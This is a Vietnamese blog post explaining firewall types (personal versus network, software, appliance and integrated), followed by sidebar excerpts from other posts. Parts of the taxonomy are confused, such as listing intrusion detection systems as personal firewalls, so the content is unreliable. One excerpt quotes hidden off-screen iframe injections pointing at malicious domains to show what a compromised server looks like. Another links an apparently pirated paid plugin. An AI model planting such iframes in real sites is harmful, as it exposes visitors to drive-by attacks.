PHÂN LOẠI FIREWALL



Firewall (tường lửa) bắt nguồn từ một kỹ thuật thiết kế trong xây dựng để ngăn chặn và hạn chế hỏa hoạn. Trong lĩnh vực công nghệ thông tin, Firewall là hệ thống phần cứng hoặc phần mềm được tích hợp vào hệ thống mạng để chống sự truy cập trái phép, nhằm bảo vệ dữ liệu nội bộ và ngăn chặn những xâm nhập không mong muốn.

Firewall giống như “người giữ cửa” giúp kiểm soát luồng thông tin giữa Intranet và Internet, tùy vào nhu cầu sử dụng, mà Firewall được phân chia ra thành hai loại: Personal Firewall và Network Firewall. Cùng theo dõi bài viết để hiểu rõ hơn về phân loại Firewall.

1. Personal Firewall

Personal Firewall được thiết kế để bảo vệ một máy tính cá nhân trước những xâm nhập trái phép từ những lưu lượng Internet không mong muốn. Một số Personal Firewall thông dụng như: windows firewall ZoneAlarm, ipfirewall (Mac OS, Cisco Security Agent…Loại Firewall này rất hữu ích đối với các cá nhân nhỏ lẻ bởi họ chỉ cần bảo vệ máy tính riêng lẻ, chức năng này đã được tích hợp sẵn trong máy tính PC, laptop...
Personal Firewall được chia làm hai loại:

a. Host-Based intrusion detection systems (HIDS)

Tính năng của Host-Based intrusion detection systems dùng để phân tích, giám sát những hoạt động xảy ra trong máy tính và phát hiện những xâm phạm trái phép. Ưu điểm của HIDS chính là có thể dịch (interpret) lưu lượng mạng được mã hóa. Tuy nhiên, khi xảy ra bất kỳ vấn đề nào, các yêu cầu về tài nguyên, cơ sở dữ liệu trên máy tính sẽ không còn khả dụng.

b. Network intrusion detection system (NIDS)

NIDS là một ứng dụng độc lập được load trên máy tính. Việc sử dụng NIDS giúp kiểm tra tất cả các gói tin đi qua mạng. Ưu điểm của Firewall này chính là giá rẻ hơn, ít tiêu tốn tài nguyên hệ thống và toàn bộ mạng đều được quét các hoạt động độc hại. Ngược lại, NIDS không giúp bạn giám sát những hoạt động xảy ra bên trong hệ thống.
Hệ thống phát hiện IDS (Intrusion Detection) được cài đặt trực tiếp bên trong hệ điều hành. Hệ thống này thực hiện hai chức năng chính: đầu tiên – thống kê những bất thường. Chức năng này chính là thiết lập một đường gốc trên máy tính và mạng để đánh giá và so sánh các hoạt động của lưu lượng mạng với đường gốc nhằm phát hiện những bất ổn trong hệ thống máy tính. Chức năng thứ hai chính là dựa trên chữ ký. Lưu lượng mạng sẽ phân tích những cuộc tấn công trước đó và lưu dưới dạng chữ ký, chữ ký này phải được cập nhật thường xuyên để có hiệu quả cao nhất.

2. Network Firewall

Network Firewall được thiết kế để bảo vệ các host trong mạng trước sự tấn công từ bên ngoài, hệ thống này có toàn quyền về việc cấp hoặc từ chối yêu cầu truy cập mạng trên Internet của một cá nhân hoặc một doanh nghiệp. Một số loại Network Firewall phổ biến:  Cisco PIX, Cisco ASA, Juniper NetScreen firewall, Nokia firewalls, Symantec’s Enterprise Firewall…Khi công nghệ ngày càng phát triển, Network Firewall cũng tích hợp thêm nhiều tính năng mới: thiết lập kết nối VPN, phát hiện xâm nhập…theo đó là nhiều sản phẩm firewall ra đời:

 a. Software Firewall

Software Firewall hay Firewall mềm – là những firewall được cài đặt sẵn trên hệ điều hành, đóng vai trò như một DNS hay một DHCP Server.
Firewall mềm có ưu điểm là dễ dàng thay đổi và nâng cấp thiết bị nhanh chóng hơn so với firewall cứng. Tuy nhiên, việc cài đặt trên hệ điều hành không hoàn toàn hoàn hảo, khả năng xuất hiện lỗ hổng trên hệ điều hành luôn có thể xảy ra. Khi đó, dù phát hiện kịp thời và vá những lỗi đó vẫn không thể hoạt động bình thường như trước được nữa.

b. Appliance Firewall

Appliance Firewall hay Firewall cứng – là những firewall được tích hợp trực tiếp lên phần cứng. Tính năng mà firewall cứng cung cấp giúp hệ thống được bảo mật tốt hơn, hiệu suất hoạt động ổn hơn và chi phí thấp hơn so với firewall mềm. Tuy nhiên, firewall cứng hạn chế về độ linh hoạt, không thể thêm bất kỳ chức năng, quy tắc nào khác như firewall mềm.

c. Integrated Firewall

 Integrated Firewall hay Firewall tích hợp – hệ thống này đảm nhận những chức năng khác như VPN, lọc thư rác, chống virus, phòng chống xâm nhập. Việc sử dụng loại firewall này giúp đơn giản hóa công tác thiết kế mạng, giảm chi phí quản lý và gánh nặng phản trị.

Qua những phân tích trên có thể tóm lại rằng, sự khác biệt lớn nhất giữa hai loại Firewall này chính là số lượng host được bảo vệ. Trong khi Personal Firewall chỉ bảo vệ cho một máy duy nhất thì Network Firewall có thể bảo vệ cho cả hệ thống mạng. Trên đây là những thông tin cơ bản về phân loại, hy vọng sẽ giúp ích cho các bạn.


Nhận xét

Đăng nhận xét

Bài đăng phổ biến từ blog này

Sự khác biệt giữa VPS, VDS và PDS là gì?

1. VPS - Máy chủ riêng ảo VPS là một máy chủ cá nhân và là một bước đi từ một tùy chọn lưu trữ chia sẻ tiêu chuẩn, nơi mà trang web của bạn sẽ chia sẻ không gian máy chủ với bất kỳ số trang web khác. Phần "ảo" của VPS đề cập đến thực tế rằng nó không phải là máy chủ vật lý, mà là một máy chủ ảo, chạy phần mềm và hệ điều hành riêng của nó. Một trong những lợi ích chính của việc có máy chủ riêng của bạn có nghĩa là bạn có nhiều tự do hơn để cấu hình nó để đáp ứng nhu cầu chính xác của bạn, như bạn không chia sẻ nó với các trang web khác. Chia sẻ máy chủ thường có thể làm cho trang web của bạn chạy chậm hơn, và đây là một trong những lý do tại sao mọi người sẽ nâng cấp lên VPS từ một tùy chọn lưu trữ chia sẻ chuẩn khi trang web của họ phát triển. Tìm hiểu về vps tại đây:   VPS, hướng dẫn vps hosting 2. VDS - Máy chủ chuyên dụng ảo Tiếp theo từ VPS là VDS , cung cấp hiệu suất hoạt động cao, độ tin cậy và khả năng mở rộng. Một lần nữa, đây là một lợi ích lớn cho các do
Đọc thêm

Cách khắc phục lỗi All in one wp migration không thể up file quá lớn - share All in one wp migration không giới hạn

Mặc dù All in one wp migration là plugin khá hửu dụng khi bạn chuyển máy chủ; Nhưng trong quá trình tải file .wpress có thể sẽ xảy ra lỗi không thể đăng tải. Tôi sẽ viết về cách giải quyết tình huống này. 1. Tải file .wpress lên thư mục backups Tạo kết nối FTP với máy chủ mới và truy cập /wp-content/ai1wm-backups/. Thư mục ai1wm-backups giả định rằng plugin All in one wp migration đã được cài đặt trong máy chủ mới. FTP sẽ tải lên file .wpress được tải xuống từ máy chủ củ và lưu vào thư mục ai1wm-backups. Chọn Restore từ plugin All in one wp migration>backups, bạn sẽ thấy file .wpress được tải lên bởi FTP vào Backup của plugin All in one wp migration. Chọn RESTORE từ nút ở góc phải để khôi phục tập tin. 2. Dùng plugin bản trả phí không giới hạn Và đâylà bản không giới hạn các bạn có thể up và backup thoải mái không lo bị lỗi: https://drive.google.com/open?id=1rXrabVsbNGIR4n5a1eIPqWpKfJl00tkk Vậy là bạn đã hoàn thành việc di chuyển trang web. Thật dễ dàng với plu
Đọc thêm

Cpanel-based servers bị redirect về những trang web xấu

Hình ảnh
Có rất nhiều cách để chèn một đoạn mã độc vào website. Attacker có thể thay đổi bất cứ file nào trên web chẳng hạn như index.php, .htaccess hay php.ini. Đây là những cách phổ dụng nhất đặc biệt là với môi trường shared hosting. Tuy nhiên trong vòng 1 năm trở lại đây, 1 cách thức mới để chèn các đoạn mã độc này đã xuất hiện, đó là thông qua các Apache module Để xác định việc bị nhiễm thông qua Apache module, chúng ta hãy xem cách thức 1 iframe được chèn vào như sau: style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframe src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div> or <style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <divhttx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div> Domain name được thay đổi thư
Đọc thêm